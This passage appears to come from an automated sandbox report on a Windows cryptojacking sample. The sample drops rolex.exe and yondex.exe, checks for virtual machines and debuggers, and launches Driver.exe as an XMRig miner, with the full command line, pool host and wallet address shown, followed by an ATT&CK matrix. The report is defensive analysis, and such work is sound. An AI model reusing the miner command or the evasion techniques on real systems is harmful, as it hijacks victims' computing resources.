                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569891
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569750
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569594
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569464
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568922
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568756
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568620
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568469
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568198
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568071
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567937
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567801
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567668
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567531
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567404
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567275
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567140
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566844
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566687
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566553
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566410
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566265
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565997
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565866
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565718
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565588
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565462
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565342
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565084
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564946
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564812
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564686
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564547
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564406
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564277
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564140
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563984
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563844
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563703
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563515
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563375
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563250
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562966
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562836
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562656
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562359
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562211
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562079
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561935
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561797
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561640
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561493
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561348
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561210
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560930
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560804
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560625
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560453
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560305
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560140
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559858
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559727
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559578
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559462
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559321
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559163
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558889
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558757
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558594
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558451
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558315
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558166
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557875
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557742
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557605
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557471
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556943
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556811
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556684
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556354
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555931
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555797
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555686
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555529
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555364
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555085
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554984
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554874
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554765
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554656
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554547
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554437
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554218
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 553890
                  Source: yondex.exe, 00000010.00000002.2078023895.00000000013C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                  Source: Driver.exe, 0000000A.00000002.2583502346.00000000005E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                  Source: Driver.exe, 0000001D.00000002.4172854345.0000000000491000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_9
                  Source: Driver.exe, 00000015.00000002.3029846124.00000000005D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$}T
                  Source: Driver.exe, 00000005.00000002.1804831542.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 0000000A.00000002.2583502346.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000015.00000002.3029846124.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000019.00000002.3336155249.0000000000611000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 0000001D.00000002.4172854345.0000000000491000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Driver.exe, 0000000A.00000002.2583502346.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000019.00000002.3336155249.0000000000611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws\System32\en-US\wshqos.dll.mui
                  Source: yondex.exe, 00000004.00000002.1854091999.0000000001131000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll <;2?
                  Source: rolex.exe, 00000003.00000002.2047592376.000001FEA81E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Driver.exe, 00000005.00000002.1804831542.0000000000485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWA
                  Source: yondex.exe, 0000000C.00000002.1975490688.0000000000A72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeCode function: 4_2_013F2E9E LdrInitializeThunk,4_2_013F2E9E
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559576D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6559576D8
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655960D20 GetProcessHeap,0_2_00007FF655960D20
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559576D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6559576D8
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655953170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF655953170
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655952510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF655952510
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655953354 SetUnhandledExceptionFilter,0_2_00007FF655953354
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF7AB4C2510
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C3354 SetUnhandledExceptionFilter,3_2_00007FF7AB4C3354
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF7AB4C3170
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF7AB4C76D8
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65594B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65594B190
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe rolex.exe -priverdDJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 764Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 764Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7440 -s 552Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 7424 -ip 7424Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 876Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 1712 -ip 1712Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1712 -s 864Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: conhost.exe, 0000001E.00000002.4173447200.000002A8EB1B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: conhost.exe, 0000001E.00000002.4173447200.000002A8EB1B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: conhost.exe, 0000001E.00000002.4173447200.000002A8EB1B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: conhost.exe, 0000001E.00000002.4173447200.000002A8EB1B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559658E0 cpuid 0_2_00007FF6559658E0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF65594A2CC
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_00007FF7AB4BA2CC
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeQueries volume information: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeQueries volume information: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeQueries volume information: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe VolumeInformation
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655950754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,SleepEx,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF655950754
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559351A4 GetVersionExW,0_2_00007FF6559351A4
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\System32\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\System32\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts1
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		1
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter                  		21
                  Registry Run Keys / Startup Folder                  		12
                  Process Injection                  		1
                  Disable or Modify Tools                  		LSASS Memory141
                  Security Software Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading                  		21
                  Registry Run Keys / Startup Folder                  		41
                  Virtualization/Sandbox Evasion                  		Security Account Manager2
                  Process Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  DLL Side-Loading                  		12
                  Process Injection                  		NTDS41
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeylogging113
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Software Packing                  		Cached Domain Credentials2
                  File and Directory Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync36
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1461232 Sample: h2UFp4aCRq.exe Startdate: 23/06/2024 Architecture: WINDOWS Score: 100 82 pool.supportxmr.com 2->82 84 pool-fr.supportxmr.com 2->84 86 cv99160.tw1.ru 2->86 97 Snort IDS alert for network traffic 2->97 99 Sigma detected: Xmrig 2->99 101 Multi AV Scanner detection for domain / URL 2->101 103 12 other signatures 2->103 11 h2UFp4aCRq.exe 13 2->11         started        14 yondex.exe 2->14         started        16 svchost.exe 3 18 2->16         started        18 2 other processes 2->18 signatures3 process4 file5 80 C:\Users\user\AppData\Local\...\rolex.exe, PE32+ 11->80 dropped 20 cmd.exe 1 11->20         started        22 Driver.exe 14->22         started        25 Driver.exe 14->25         started        27 Driver.exe 14->27         started        29 WerFault.exe 2 16->29         started        31 WerFault.exe 16->31         started        33 WerFault.exe 16->33         started        35 WerFault.exe 16->35         started        process6 dnsIp7 37 rolex.exe 9 20->37         started        41 conhost.exe 20->41         started        90 141.94.96.195, 3333, 49825 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 22->90 43 conhost.exe 22->43         started        45 WerFault.exe 22->45         started        93 141.94.96.71, 3333, 49843 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 25->93 47 conhost.exe 25->47         started        49 conhost.exe 27->49         started        51 WerFault.exe 27->51         started        signatures8 123 Detected Stratum mining protocol 93->123 process9 file10 72 C:\Users\user\AppData\Local\...\yondex.exe, PE32 